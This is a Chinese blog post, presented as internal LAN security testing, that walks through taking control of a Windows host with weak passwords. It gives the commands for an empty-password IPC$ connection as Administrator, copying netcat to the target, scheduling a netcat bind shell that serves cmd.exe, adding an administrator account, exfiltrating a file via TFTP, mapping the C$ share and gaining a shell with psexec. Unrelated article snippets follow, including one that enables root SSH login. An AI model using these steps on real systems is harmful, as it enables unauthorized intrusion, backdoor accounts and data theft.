局域网内部安全测试--------利用弱密码控制远程计算机

最新推荐文章于 2025-07-04 09:17:07 发布
最新推荐文章于 2025-07-04 09:17:07 发布
阅读量2.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 发表文章 文章标签: 测试 user 作业 shell 任务 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csforgood/article/details/708989
本文通过实战案例介绍如何使用X-Scan等工具进行内部网络扫描,发现并利用弱密码漏洞,建立IPC连接,并通过多种手段如复制文件、添加用户、执行远程命令等方式获取目标主机的控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先扫描内部网段(网上扫描软件很多,我习惯用X-Scan),获得弱密码

可以看到现在已经扫描出来许多弱密码,可以进一步控制

首先和对方建立连接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
这是和ip为10.1.12.84的计算机建立IPC连接

copy nc.exe //10.1.12.84/admin$/system32,    nc.exe是一个获得控制台木马的服务器端。
复制一个文件到对方计算机的system32目录下面
这里复制的是一个telnet类连接工具。
nc是netcat的简写,通常称为黑客界的"瑞士军刀",功能比较强大。

net time //10.1.12.84
查看对方计算机时间,以便利用计划任务   上午 08:40

at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一项作业,其作业 ID = 1
添加一个任务,在08:42运行;运行之后将开放一个端口:5000
可以通过这个端口获得一个shell ,即控制台

运行之后就可以连接了
nc 10.1.12.84 5000
和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接,获得一个shell.

出现C:/WINDOWS/system32>
现在就成功进入了对方计算机,管理员权限。

 

现在测试一下能否在对方计算机上执行命令

查看用户
net user
3个用户

添加一个用户试试。
net user testuser testpass /add
命令成功完成

查看用户
net user
4个用户

将添加的用户加入管理员组。
net localgroup administrators testuser /add
命令成功完成

看看刚添加的用户情况
net user testuser
管理员Administrators组

删除用户
net user testuser /del

ipconfig 看它的IP :  10.1.12.84

窃取资料
dir c:/
假设现在要c:/SOUND.LOG
先在本地架设tftp服务器
tftp -i 10.1.16.148 put c:/sound.log
成功传回

 

退出。

再测试一下磁盘映射,现在我的电脑的硬盘分区为C D E F
net use x: //10.1.16.148/c$
查看我的电脑,多了一个x盘。
现在操作对方文件如同操作自己计算机上的文件一样。
x盘实际上就是对方的c盘
删除映射
net use x: /del


利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权
psexec.exe //10.1.12.84 cmd
出现了shell,又进去了!
C:/WINDOWS/system32>

退出!

删除连接
net use //10.1.12.84/ipc$ /del

演示结束,谢谢 !

局域网弱口令扫描工具_安全测试技术 | 渗透测试获取弱口令密码,你的账号安全了吗?...
weixin_39581099的博客
11-28 669
1.Burp suite官网下载Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。 它主要用来做安全性渗透测试,可以实现拦截请求、Burp Spider爬虫、漏洞扫描(付费)等类似Fiddler和Postman但比其更强大的功能。burp suite可...
软考中级-软件设计师 知识点整理(一篇就过了 建议收藏)
热门推荐
片言可决讼,半纸能缚龙
09-23 15万+
软考中级-软件设计师上午题知识点总结
局域网的安全攻防测试与分析
09-05
近年来,随着计算机在办公中的普及应用,局域网在办公中地位的日渐突出,针对局域网的攻击也日益增多。这类攻击有以病毒的形式进行传播和攻击,也有网络黑客的破坏和IP地址被盗用等各种形式,不论怎样,这都严重影响了计算机中数据的安全性。
局域网安全的攻防测试与分析
05-07
局域网(Local Area Network),简称LAN,是指在某一区域内由多台计算机互联成 的计算机组。―某一区域‖指的是同一办公室、同一建筑物、同一公司和同一学校等,一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、(扫描仪共享(注:扫描仪不能共享))工作组内的日程安排、电子邮件和传真通信服务等功能。局域网是封闭型的,可以由办公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成
局域网弱口令扫描工具_火绒产品公告——企业版新增动态口令功能 二次验证加强中心安全...
weixin_39580682的博客
12-07 382
火绒企业版针对火绒控制中心(以下简称中心)的防护新增“动态口令”功能。开启该功能后,通过登录中心时进行二次验证的方式,阻止中心遭遇密码泄露、弱口令暴破、撞库等黑客破解行为带来的危害,达到保护火绒控制中心的目的。除控制中心“动态口令”功能外,火绒也将推出“终端动态认证”功能。从而进一步加强企业终端的安全性。适用用户及场景:1、中心连接外部互联网的企业。2、中心登录密码较为简单,且不方便定期修改的企业...
内网弱口令扫描工具
09-26
内网弱口令扫描工具
2022年大学计算机基础(Windows-10+Office-2016)综合测试卷及答案(题库).docx
06-08
### 2022年大学计算机基础(Windows-10+Office-2016)综合测试卷知识点解析 #### 单项选择题知识点解析 **1. 在下列操作可以使选定的单元格区域输入相同数据的是(C)。** - **知识点解析**: - **背景**:在...
第65天-内网安全-域环境&工作组&局域网探针方案
MCTSOG的博客
05-07 2116
思维导图 知识点 主要都是一些概念的理解 DMZ: 英文全名“Demilitarized Zone”,中文含义是“隔离区”,在安全领域的具体含义是“内外网防火墙之间的区域”。DMZ区是一个缓冲区,在DMZ区存放着一些公共服务器,比如论坛等。 局域网 局域网就是内部网,局域网内部的电脑共用与外部的物理连接 工作组 ​ 工作组(Work Group)是局域网中的一个概念。它是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,以方便管理。它是最常见最简单最普通的资源管理模式,就是
计算机网络》课程大作业- 《小区局域网的设计和规划》
lisangsimida的博客
11-21 1868
8.1首先,在满足用户需求方面,通过详细的需求分析,充分考虑了居民和物业管理的不同业务需求。对于居民,无论是日常的高清视频播放、在线游戏、远程办公还是智能家居设备的连接,网络都能提供稳定的高速带宽支持。从有线网络的千兆以太网技术保障稳定的有线连接,到无线网络采用 Wi - Fi 6 技术确保无线覆盖区域的高速和低延迟,满足了居民多样化的娱乐和生活需求。对于物业管理,安防监控系统的实时数据传输、物业办公自动化系统的流畅运行以及社区信息的及时发布等业务,都有针对性的网络设计。
2Wire 2700HG-D路由器设置方法
05-25
接着,将计算机或其他设备通过以太网线连接到路由器的LAN口,一般有4个或更多,用于局域网内部通信。同时,路由器的电源适配器也要正确接入,启动设备。 二、初始化设置 在硬件连接完成后,打开电脑的Web浏览器,...
弱口令扫描
11-21
为了探测到可以登录的用户名和密码,攻击者往往使用扫描技术来探测用户名和弱口令
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,22,21等端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
路由器密码扫描工具
01-24
善于寻找和确定不同的设备,发现大量已知的路由器或服务器,最重要的是把其中有用的信息,特别是无线网络的保护方法的特点:接入点的接入点名称(加密),接入点(SSID)和密钥(密码)(关于广域网的连接也方便获取信息时,扫描局域网)和输出的牌子和路由器型号。
远程桌面终端服务加密SSL
07-22
当客户机使用SSL加密模式连接服务器并控制服务器后,在网络中传输的所有信息都是加密过的,黑客使用sniffer等工具无法抓取到可用的数据包。从而真真正正的将远程桌面的安全进行到底。远程操作界面也出现了SSL加密的图标。
国外windows 弱口令检测工具
12-07
国外windows 弱口令检测工具,xTSCrack is a simple RDP Audit tool for Penentration Tester find weak passwords over RDP protocol. xTSCrack support Windows 2000, XP, 2003 and 2008 Terminal Service.
内网安全测试基础学习笔记
weixin_30692143的博客
06-11 179
0X01内网渗透测试 一般的步骤 0X02内网渗透的基础 内网概述 行政部的就加入行政组 技术组的 了解域 多个域的情况下面 转载于:https://www.cnblogs.com/-zhong/p/11006101.html...
局域网渗透测试
qq_44635376的博客
03-01 1168
局域网渗透测试-链接上wifi以后的骚操作中间人攻击arpspoof&&driftnet篇driftnet软件参数详解ettercap进行arp攻击mitmf注入脚本(XSS)kali使用密文直接登录pth-winexe工具 中间人攻击 arpspoof&&driftnet篇 arpspoof详解 #安装dsniff(arpspoof是dsniff集成的一个工具)和driftnet apt-get install dsniff apt-get install driftne
弱口令扫描工具有哪些?检测的主要方法及常用弱口令密码
最新发布
Python84310366的博客
07-04 1170
弱口令工具主要用于密码破解、安全评估和网络防御测试。这些工具通过尝试一系列常用的弱口令来检测系统或账户的安全性。
内网渗透之——常规渗透方式及思路(端口扫描、 弱口令扫描、ms17_010利用、hash注入、远程连接&执行程序......)
wsnbbz的博客
03-25 7276
端口扫描 常见端口以及攻击方式 具体扫描方法点此跳转我的另一文章,里面详细介绍了端口扫描工具的使用 弱口令扫描 弱口令扫描,例如对于mysql,vnc,rdp,http管理登录等弱口令进入的服务,可以使用一些弱口令扫描工具,xscan,hydra,medusa,nmap等。也可以自己找到更多更好的工具 hydra 1.先用nmap扫描开发了哪些端口 2.使用hydra对可以进行弱...
5.测试debian-12.1.0虚拟机网络与SSH远程登录 5.1新建虚拟机
02-27
### 创建并配置 Debian 12.1.0 虚拟机 #### 新建虚拟机 为了创建新的 Debian 12.1.0 虚拟机,需按照所使用的虚拟化平台(如 VirtualBox 或 VMware)的具体指导完成安装过程。确保选择合适的硬件资源分配给虚拟机以保障性能。 #### 启动虚拟机并进入命令行界面 启动刚创建好的 Debian 12.1.0 虚拟机,在首次引导过程中会提示进行初始设置,包括但不限于主机名、时区以及用户账户的建立等操作[^1]。 #### 查看虚拟机 IP 地址 一旦成功部署并运行了操作系统,则可以通过执行 `ip addr` 命令来获取当前系统的网络接口详情及其对应的 IPv4/IPv6 地址信息: ```bash ip addr show ``` 如果发现缺少有效的 IP 分配,可能是因为 DHCP 客户端未能正常工作或是物理网卡未被激活;此时可以尝试重启网络服务或者手动指定静态 IP 设置[^3]。 #### 测试网络连通性 确认获得了正确的 IP 地址之后,可利用 ping 工具验证外部可达性和内部局域网内的其他设备之间的通信状况: ```bash ping www.example.com ``` 这一步骤有助于排除任何潜在的基础架构层面的问题,比如 DNS 解析失败或者是防火墙阻止流量等问题。 #### 安装 OpenSSH Server 并允许 Root 登录 对于希望实现基于 SSH 的远程管理而言,先要确保已安装 openssh-server 包件: ```bash sudo apt update && sudo apt install -y openssh-server ``` 编辑 `/etc/ssh/sshd_config` 文件调整如下参数以便支持 root 用户直接登录: ```diff PermitRootLogin yes PasswordAuthentication yes ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server ``` 保存更改后记得重启 ssh 服务使修改生效: ```bash sudo systemctl restart ssh ``` 注意上述做法存在一定的安全隐患,因此建议采取额外的安全防护措施,例如限制特定 IP 访问、定期更换强密码等方式降低风险水平[^2]。 #### 使用客户端工具连接到目标机器 最后,在另一台计算机上打开终端窗口输入类似下面这样的指令来进行实际测试: ```bash ssh root@<your_debian_vm_ip> ``` 替换 `<your_debian_vm_ip>` 为之前查询所得的真实数值即可尝试登陆该服务器实例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值